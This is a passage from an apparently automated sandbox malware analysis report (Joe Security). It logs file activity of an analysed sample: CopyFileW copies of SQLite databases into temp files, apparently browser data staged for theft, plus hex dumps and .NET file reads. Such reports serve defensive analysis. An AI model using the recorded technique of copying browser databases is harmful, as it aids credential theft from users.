0 40960 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 03 00 00 00 14 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 2e 43 fd 05 00 00 00 01 07 fd 00 00 00 00 10 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp6AC0.tmp
0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 54 of 65
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp
0 28672 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 10 00 01 01 00 40 20 20 00 00 00 09 00 00 00 07 00 00 00 07 00 00 00 02 00 00 00 0d 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 00 2e 43 fd 0d 0d 2e 00 04 0c fd 00 0f 67 0f fd 0d 4e 0c fd 0c fd 0c fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .C.gN success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7108.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 55 of 65
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp72BF.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 56 of 65
C:\Users\user\AppData\Local\Temp\tmp738B.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7486.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 57 of 65
C:\Users\user\AppData\Local\Temp\tmp7551.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp764C.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 58 of 65
C:\Users\user\AppData\Local\Temp\tmp7718.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7841.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 59 of 65
C:\Users\user\AppData\Local\Temp\tmp790D.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp79D9.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 60 of 65
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 08 00 01 01 00 40 20 20 00 00 00 04 00 00 00 25 00 00 00 00 00 00 00 00 00 00 00 2f 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 43 fd 05 00 00 00 03 07 fd 00 00 00 00 1f 07 fd 07 fd 07 fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ %/.C success or wait 2 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp7BCE.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 61 of 65
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp
0 65536 53 51 4c 69 74 65 20 66 6f 72 6d 61 74 20 33 00 fd 00 02 02 00 40 20 20 00 00 00 04 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 2e 09 28 0d 7f fd 00 03 7d fd 00 7e 1d 7f fd 7d fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
SQLite format 3@ .(}~} success or wait 8 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp533A.tmp
0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c
AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL
success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 62 of 65
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp
0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50
NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP
success or wait 1 3E6803 CopyFileW
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp
0 1026 41 49 58 41 43 56 59 42 53 42 43 5a 44 4a 4d 5a 55 44 56 4e 45 43 4d 46 53 47 4a 53 41 4f 41 49 58 43 4a 46 44 50 48 51 4a 56 55 41 4e 55 46 46 50 51 58 56 59 4a 52 55 47 59 50 4a 47 4b 45 4a 4e 58 43 42 54 58 41 52 41 45 54 41 4b 46 54 4a 4b 56 4c 49 5a 45 58 4c 4d 4f 41 50 56 45 5a 52 5a 5a 55 49 52 44 55 4b 53 50 5a 52 42 50 49 4e 4e 45 4b 4c 43 4c 58 42 48 46 5a 4d 42 52 4a 54 55 4a 5a 54 52 43 47 51 47 46 52 51 43 45 56 50 55 42 41 41 50 42 48 42 54 59 59 48 44 4a 5a 48 48 50 4d 46 41 4b 58 56 4a 50 51 52 51 43 52 55 46 59 50 4d 4e 55 43 52 52 51 4f 59 58 59 45 48 58 51 45 48 57 48 46 4c 5a 53 42 4d 4c 52 52 5a 46 4c 4c 59 55 51 4c 41 44 54 4b 45 44 58 56 44 4c 4b 4c 50 5a 54 54 43 4e 41 58 4d 58 50 53 54 43 48 51 4b 57 4d 53 52 50 4e 52 5a 47 55 4c
AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL
success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
Copyright Joe Security LLC 2022 Page 63 of 65
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp
0 1026 4e 48 50 4b 49 5a 55 55 53 47 45 52 51 53 4c 42 47 53 45 41 56 58 47 4e 44 57 58 4e 48 52 49 4d 47 4b 51 5a 49 59 47 4d 4e 41 4b 4c 44 53 44 4c 4d 5a 54 53 48 57 4e 51 53 4d 52 4c 54 4f 58 4b 49 51 56 5a 57 50 54 50 4d 59 47 43 43 43 54 4f 51 4d 4f 46 47 50 59 56 56 43 43 55 44 4f 52 49 58 4d 4d 58 44 48 4b 43 45 54 55 4c 42 48 4c 4a 45 4e 41 42 45 49 4a 50 54 46 4f 48 46 50 49 55 55 53 46 50 55 48 53 42 48 45 4e 44 41 4e 46 4d 4f 59 5a 52 5a 41 58 59 56 46 45 5a 49 4b 44 4b 55 45 56 5a 41 57 45 46 4b 52 54 55 4a 5a 50 46 55 44 4d 45 5a 5a 51 56 42 47 59 4d 4d 49 48 4b 45 42 59 4a 4d 4a 4d 54 54 58 53 44 54 44 51 41 55 41 54 58 4c 41 42 4c 42 45 4a 55 42 42 50 53 58 5a 50 58 4d 48 56 4e 48 4f 48 59 50 4b 43 59 4c 44 56 47 4a 53 42 50 45 58 57 47 59 56 50
NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP
success or wait 1 3E6803 CopyFileW
File Path Offset Length Value Ascii Completion Count Source Address Symbol
File Path Offset Length Completion Count Source Address Symbol
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6D517995 unknown
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux
unknown 176 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux
unknown 900 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux
unknown 620 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\aac4a7fee37b96c05eb0862217745fc1\System.ServiceModel.ni.dll.aux
unknown 3948 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\9b0d0cb232dec8e57df49678532cb923\System.Runtime.Serialization.ni.dll.aux
unknown 1100 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\cde471ea4f02c36c73581ed5681e463e\SMDiagnostics.ni.dll.aux
unknown 924 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux
unknown 748 success or wait 1 6D42DE2C ReadFile
